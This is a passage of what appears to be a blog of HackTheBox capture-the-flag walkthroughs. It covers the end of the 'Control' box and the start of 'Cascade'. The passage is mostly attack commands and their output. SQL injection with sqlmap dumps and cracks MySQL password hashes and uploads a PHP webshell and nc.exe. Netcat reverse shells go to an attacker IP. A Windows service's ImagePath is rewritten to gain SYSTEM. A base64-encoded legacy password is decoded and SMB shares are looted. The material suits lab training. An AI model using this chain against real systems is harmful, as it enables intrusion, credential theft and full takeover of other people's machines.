After that, run the following command to retrieve password hashes for MySQL.
We can achieve 3 hashes for hector, manager and root.
root@kali:~# sqlmap -r request.txt --password
---
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
[18:50:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[*] ending @ 18:50:54 /2020-08-22/
Using John the Ripper, we can crack the password hash with rockyou.txt.
root@kali:~# cat hash.txt
hector:*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager:*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
root:*0A4A5CAD344718DC418035A1F4D292BA603134D8
root@kali:~# john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=mysql-sha1
Using default input encoding: UTF-8
Loaded 3 password hashes with no different salts (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
l33th4x0rhector (hector)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:01 DONE (2020-08-22 18:57) 0.7299g/s 10468Kp/s 10468Kc/s 25610KC/sa6_123..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Now we got this credential.
Next, to achieve a shell, upload a PHP webshell using the following command.
We have simple-backdoor.php installed on Kali linux.
root@kali:~# sqlmap -r request.txt --file-write=/usr/share/webshells/php/simple-backdoor.php --file-dest=C:/inetpub/wwwroot/backdoor.php
---
[*] starting @ 19:05:43 /2020-08-22/
[19:05:43] [INFO] parsing HTTP request from 'request.txt'
[19:05:43] [INFO] resuming back-end DBMS 'mysql'
[19:05:43] [INFO] testing connection to the target URL
---
[19:05:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[19:05:44] [INFO] fingerprinting the back-end DBMS operating system
[19:05:44] [INFO] the back-end DBMS operating system is Windows
[19:05:45] [WARNING] potential permission problems detected ('Access denied')
[19:05:46] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
do you want confirmation that the local file '/usr/share/webshells/php/simple-backdoor.php' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/backdoor.php')? [Y/n] Y
[19:06:05] [INFO] the local file '/usr/share/webshells/php/simple-backdoor.php' and the remote file 'C:/inetpub/wwwroot/backdoor.php' have the same size (328 B)
[19:06:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[*] ending @ 19:06:05 /2020-08-22/
To confirm if we uploaded our webshell correctly, we use curl command.
root@kali:~# curl http://10.10.10.167/backdoor.php?cmd=whoami
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre>nt authority\iusr
</pre>
Next, upload nc.exe to get a reverse shell.
root@kali:~# sqlmap -r request.txt --file-write=/usr/share/windows-binaries/nc.exe --file-dest=C:/inetpub/wwwroot/nc.exe
---
do you want confirmation that the local file '/usr/share/windows-binaries/nc.exe' has been successfully written on the back-end DBMS file system ('C:/inetpub/wwwroot/nc.exe')? [Y/n] Y
[19:23:18] [INFO] the local file '/usr/share/windows-binaries/nc.exe' and the remote file 'C:/inetpub/wwwroot/nc.exe' have the same size (59392 B)
[19:23:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[*] ending @ 19:23:18 /2020-08-22/
Using the webshell we uploaded, we can execute dir command.
The uploaded nc.exe is in the folder C:\inetpub\wwwroot.
root@kali:~# curl http://10.10.10.167/backdoor.php?cmd=dir+C:\\inetpub\\wwwroot
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<pre> Volume in drive C has no label.
Volume Serial Number is C05D-877F
Directory of C:\inetpub\wwwroot
08/22/2020 12:36 PM <DIR> .
08/22/2020 12:36 PM <DIR> ..
11/05/2019 03:42 PM 7,867 about.php
11/20/2019 02:16 AM 7,350 admin.php
10/23/2019 05:02 PM <DIR> assets
08/22/2020 12:19 PM 328 backdoor.php
11/05/2019 03:42 PM 479 create_category.php
11/05/2019 03:42 PM 585 create_product.php
11/05/2019 03:42 PM 904 database.php
11/05/2019 03:42 PM 423 delete_category.php
11/05/2019 03:42 PM 558 delete_product.php
11/05/2019 03:42 PM <DIR> images
11/19/2019 06:57 PM 3,145 index.php
11/05/2019 03:42 PM 17,128 LICENSE.txt
08/22/2020 12:36 PM 59,392 nc.exe
11/19/2019 07:07 PM 3,578 search_products.php
11/05/2019 03:42 PM 498 update_category.php
11/05/2019 03:42 PM 4,056 update_product.php
11/12/2019 12:49 PM <DIR> uploads
11/05/2019 03:42 PM 2,933 view_product.php
15 File(s) 109,224 bytes
5 Dir(s) 43,613,020,160 bytes free
</pre>
Now we finished preparation for getting a reverse shell.
Launch a netcat listener and execute the following curl command.
root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
root@kali:~# curl http://10.10.10.167/backdoor.php?cmd=C:\\inetpub\\wwwroot\\nc.exe+-e+powershell.exe+10.10.14.42+4443
The target machine spawns a PowerShell session and send back to our localhost as nt authority\iusr.
However, we still can’t get user.txt and need a lateral movement.
root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.167] 51393
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\inetpub\wwwroot> whoami
whoami
nt authority\iusr
PS C:\users\Hector> ls
ls
ls : Access to the path 'C:\users\Hector' is denied.
At line:1 char:1
+ ls
+ ~~
+ CategoryInfo : PermissionDenied: (C:\users\Hector:String) [Get-ChildItem], UnauthorizedAccessException
+ FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
We already have a password l33th4x0rhector for Hector.
To achieve an user shell as Hector, we still need the hostname of this machine.
PS C:\users\Hector> hostname
hostname
Fidelity
To run a command as hector, we need to execute the following commands.
Running whoami shows that the command is executed as control\hector.
PS C:\> $password = convertto-securestring -AsPlainText -Force -String "l33th4x0rhector"
$password = convertto-securestring -AsPlainText -Force -String "l33th4x0rhector"
PS C:\> $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Fidelity\hector",$password
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "Fidelity\hector",$password
PS C:\> Invoke-Command -ComputerName LOCALHOST -ScriptBlock { whoami } -Credential $credential
Invoke-Command -ComputerName LOCALHOST -ScriptBlock { whoami } -Credential $credential
control\hector
Then, achieve a reverse shell as hector.
Launch a netcat listener and run the following PowerShell command on the target machine.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
PS C:\> Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\inetpub\wwwroot\nc.exe 10.10.14.42 4444 -e powershell.exe } -Credential $credential
Go back to the netcat listener window.
We can see that we got a shell as control\hector.
root@kali:~# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.167] 51401
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\Hector\Documents> whoami
whoami
control\hector
user.txt is in the folder C:\Users\Hector\Desktop\.
PS C:\Users\Hector\Documents> cat C:\users\hector\Desktop\user.txt
cat C:\users\hector\Desktop\user.txt
d8782dd01fb15b72c4b5ba77ef2d472b
3. Getting Root
Taking a look at the PowerShell command history.
We can find only 2 commands.
PS C:\> gc (get-PSReadlineOption).HistorySavePath
gc (get-PSReadlineOption).HistorySavePath
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
The first command shows the entries of HKLM:\SYSTEM\CurrentControlset.
It contains the following 6 keys.
- Control
- Enum
- Hardware profiles
- Policies
- Services
- Software
PS C:\Users\Hector\Documents> get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
Property : {BootDriverFlags, CurrentUser, EarlyStartServices, PreshutdownOrder...}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Control
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 121
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 11
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Control
Property : {NextParentID.daba3ff.2, NextParentID.61aaa01.3, NextParentID.1bd7f811.4, NextParentID.2032e665.5...}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Enum
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 17
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 27
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Enum
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Hardware Profiles
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 3
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Hardware Profiles
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Policies
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 0
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Policies
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Services
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 667
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Services
Property : {}
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset
PSChildName : Software
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
PSIsContainer : True
SubKeyCount : 1
View : Default
Handle : Microsoft.Win32.SafeHandles.SafeRegistryHandle
ValueCount : 0
Name : HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlset\Software
The second command is for trying to get the access the permission of this registry tree.
We can find SDDL (Security Descriptor Definition Language) as well, but plain SDDL is not human readable.
PS C:\> get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet
Owner : BUILTIN\Administrators
Group : NT AUTHORITY\SYSTEM
Access : BUILTIN\Administrators Allow FullControl
NT AUTHORITY\Authenticated Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow -2147483648
S-1-5-32-549 Allow ReadKey
S-1-5-32-549 Allow -2147483648
BUILTIN\Administrators Allow FullControl
BUILTIN\Administrators Allow 268435456
NT AUTHORITY\SYSTEM Allow FullControl
NT AUTHORITY\SYSTEM Allow 268435456
CREATOR OWNER Allow 268435456
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow -2147483648
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
ReadKey
S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681 Allow
-2147483648
Audit :
Sddl : O:BAG:SYD:AI(A;;KA;;;BA)(A;ID;KR;;;AU)(A;CIIOID;GR;;;AU)(A;ID;KR;;;SO)(A;CIIOID;GR;;;SO)(A;ID;KA;;;BA)(A;CIIOI
D;GA;;;BA)(A;ID;KA;;;SY)(A;CIIOID;GA;;;SY)(A;CIIOID;GA;;;CO)(A;ID;KR;;;AC)(A;CIIOID;GR;;;AC)(A;ID;KR;;;S-1-15-
3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)(A;CIIOID;GR;;;S
-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681)
Using the following command, we can make the SDDL readable for humans.
It shows that Control\Hector has FullControl permission and we can modify the value ImagePath for specifying executables.
PS C:\Users\Hector\Documents> $acl = get-acl HKLM:\System\CurrentControlSet\Services
$acl = get-acl HKLM:\System\CurrentControlSet\Services
PS C:\Users\Hector\Documents> ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights
ConvertFrom-SddlString -Sddl $acl.Sddl -type RegistryRights
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
DiscretionaryAcl : {NT AUTHORITY\Authenticated Users: AccessAllowed (EnumerateSubKeys, ExecuteKey, Notify,
QueryValues, ReadPermissions), NT AUTHORITY\SYSTEM: AccessAllowed (ChangePermissions, CreateLink,
CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite,
Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey), BUILTIN\Administrators:
AccessAllowed (ChangePermissions, CreateLink, CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey,
FullControl, GenericExecute, GenericWrite, Notify, QueryValues, ReadPermissions, SetValue,
TakeOwnership, WriteKey), CONTROL\Hector: AccessAllowed (ChangePermissions, CreateLink,
CreateSubKey, Delete, EnumerateSubKeys, ExecuteKey, FullControl, GenericExecute, GenericWrite,
Notify, QueryValues, ReadPermissions, SetValue, TakeOwnership, WriteKey)...}
SystemAcl : {}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
After that, try to find if really Control\Hector has permission for services.
As the following result shows, we have over 3000 FullControl access for all entries (services).
PS C:\Users\Hector\Documents> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List *| findstr /i "Hector Users Path Everyone"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List *| findstr /i "Hector Users Path"
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
---
PS C:\Users\Hector\Documents> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | measure
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | measure
Count : 3427
Average :
Sum :
Maximum :
Minimum :
Property :
We can confirm that Hector\Control has permission for wuau (Windows update Automatic Update) as well.
We can take advantage of this because…
- We can restart it manually.
- It is already configured to run as LocalSystem.
PS C:\Users\Hector\Documents> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | findstr /i "wuau"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "hector Users Path Everyone" | findstr /i "wuau"
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuau
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuau
Plan to get a reverse shell as NT AUTHORITY\SYSTEM.
First, launch a netcat listener on port 4445.
root@kali:~# nc -nlvp 4445
listening on [any] 4445 ...
Since we’ve uploaded nc.exe already, we can use the following command.
Edit the ImagePath attribute of HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuau.
To start the service, we need to run Start-Service wuauserv.
PS C:\> reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\nc.exe -e powershell 10.10.14.42 4445" /f
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\inetpub\wwwroot\nc.exe -e powershell 10.10.14.42 4445" /f
The operation completed successfully.
PS C:\> Start-Service wuauserv
Now we got a reverse shell as NT AUTHORITY\SYSTEM.
root@kali:~# nc -nlvp 4445
listening on [any] 4445 ...
connect to [10.10.14.42] from (UNKNOWN) [10.10.10.167] 51404
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
As always, root.txt is in the directory C:\Users\Administrator\Desktop\.
PS C:\Windows\system32> cat C:\users\administrator\desktop\root.txt
cat C:\users\administrator\desktop\root.txt
8f8613f5b4da391f36ef11def4cec1b1
29 Jul 2020
Explanation
Hackthebox is a website which has a bunch of vulnerable machines in its own VPN.
This is a walkthrough of a box Cascade.
Solution
1. Initial Enumeration
TCP Port Scanning:
root@kali:~# nmap -p- 10.10.10.182 -sV -sC
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 20:29 JST
Nmap scan report for 10.10.10.182
Host is up (0.23s latency).
Not shown: 65520 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-07-26 11:40:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m18s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-07-26T11:41:50
|_ start_date: 2020-07-26T10:12:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 634.60 seconds
SMB Enumeration:
root@kali:~# smbclient -L 10.10.10.182
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
LDAP Enumeration (For naming contexts):
root@kali:~# ldapsearch -h 10.10.10.182 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: DC=cascade,DC=local
namingContexts: CN=Configuration,DC=cascade,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=cascade,DC=local
namingContexts: DC=DomainDnsZones,DC=cascade,DC=local
namingContexts: DC=ForestDnsZones,DC=cascade,DC=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
LDAP Enumeration:
root@kali:~# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=cascade,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# cascade.local
dn: DC=cascade,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
---
RPC Enumeration:
root@kali:~# rpcclient -U '' -N 10.10.10.182
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
rpcclient $>
2. Getting User
In the LDAP scanning result, we can find an interesting attribute cascadeLegacyPwd: clk0bjVldmE= for user r.thompson.
# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
We can encode the password with the following command.
root@kali:~# echo clk0bjVldmE= | base64 -d
rY4n5eva
Using evil-winrm, try to login as r.thompson with the password rY4n5eva.
However, we can’t achieve a shell since user r.thompson is not allowed to use it.
root@kali:~/evil-winrm# ./evil-winrm.rb -i 10.10.10.182 -u r.thompson -p rY4n5eva
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
Then, try to enumerate SMB.
We have some interesting shares.
root@kali:~# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
In /Data, we have some interesting files.
root@kali:~# smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva -R data
[+] IP: 10.10.10.182:445 Name: 10.10.10.182
Disk Permissions Comment
---- ----------- -------
data READ ONLY
.\data\*
dr--r--r-- 0 Wed Jan 29 07:05:51 2020 .
dr--r--r-- 0 Wed Jan 29 07:05:51 2020 ..
dr--r--r-- 0 Mon Jan 13 10:45:14 2020 Contractors
dr--r--r-- 0 Mon Jan 13 10:45:10 2020 Finance
dr--r--r-- 0 Wed Jan 29 03:04:51 2020 IT
dr--r--r-- 0 Mon Jan 13 10:45:20 2020 Production
dr--r--r-- 0 Mon Jan 13 10:45:16 2020 Temps
.\data\IT\*
dr--r--r-- 0 Wed Jan 29 03:04:51 2020 .
dr--r--r-- 0 Wed Jan 29 03:04:51 2020 ..
dr--r--r-- 0 Wed Jan 29 03:00:30 2020 Email Archives
dr--r--r-- 0 Wed Jan 29 03:04:51 2020 LogonAudit
dr--r--r-- 0 Wed Jan 29 09:53:04 2020 Logs
dr--r--r-- 0 Wed Jan 29 07:06:59 2020 Temp
.\data\IT\Email Archives\*
dr--r--r-- 0 Wed Jan 29 03:00:30 2020 .
dr--r--r-- 0 Wed Jan 29 03:00:30 2020 ..
fr--r--r-- 2522 Wed Jan 29 03:00:30 2020 Meeting_Notes_June_2018.html
.\data\IT\Logs\*
dr--r--r-- 0 Wed Jan 29 09:53:04 2020 .
dr--r--r-- 0 Wed Jan 29 09:53:04 2020 ..
dr--r--r-- 0 Wed Jan 29 09:53:04 2020 Ark AD Recycle Bin
dr--r--r-- 0 Wed Jan 29 09:56:00 2020 DCs
.\data\IT\Logs\Ark AD Recycle Bin\*
dr--r--r-- 0 Wed Jan 29 09:53:04 2020 .
dr--r--r-- 0 Wed Jan 29 09:53:04 2020 ..
fr--r--r-- 1303 Wed Jan 29 10:19:11 2020 ArkAdRecycleBin.log
.\data\IT\Logs\DCs\*
dr--r--r-- 0 Wed Jan 29 09:56:00 2020 .
dr--r--r-- 0 Wed Jan 29 09:56:00 2020 ..
fr--r--r-- 5967 Mon Jan 27 07:22:05 2020 dcdiag.log
.\data\IT\Temp\*
dr--r--r-- 0 Wed Jan 29 07:06:59 2020 .
dr--r--r-- 0 Wed Jan 29 07:06:59 2020 ..
dr--r--r-- 0 Wed Jan 29 07:06:55 2020 r.thompson
dr--r--r-- 0 Wed Jan 29 05:00:05 2020 s.smith
.\data\IT\Temp\s.smith\*
dr--r--r-- 0 Wed Jan 29 05:00:05 2020 .
dr--r--r-- 0 Wed Jan 29 05:00:05 2020 ..
fr--r--r-- 2680 Wed Jan 29 05:00:01 2020 VNC Install.reg
Try to download all files in the share /Data using smbclient.
root@kali:~# smbclient -U r.thompson //10.10.10.182/data rY4n5eva
Try "help" to get a list of possible commands.
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as Meeting_Notes_June_2018.html (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as ArkAdRecycleBin.log (1.4 KiloBytes/sec) (average 1.0 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as dcdiag.log (3.4 KiloBytes/sec) (average 1.8 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as VNC Install.reg (1.2 KiloBytes/sec) (average 1.6 KiloBytes/sec)
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
smb: \>
In IT/Temp/s.smith, we can find a configuration file VNC Install.reg.
root@kali:~/IT/Temp/s.smith# cat 'VNC Install.reg'
��Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
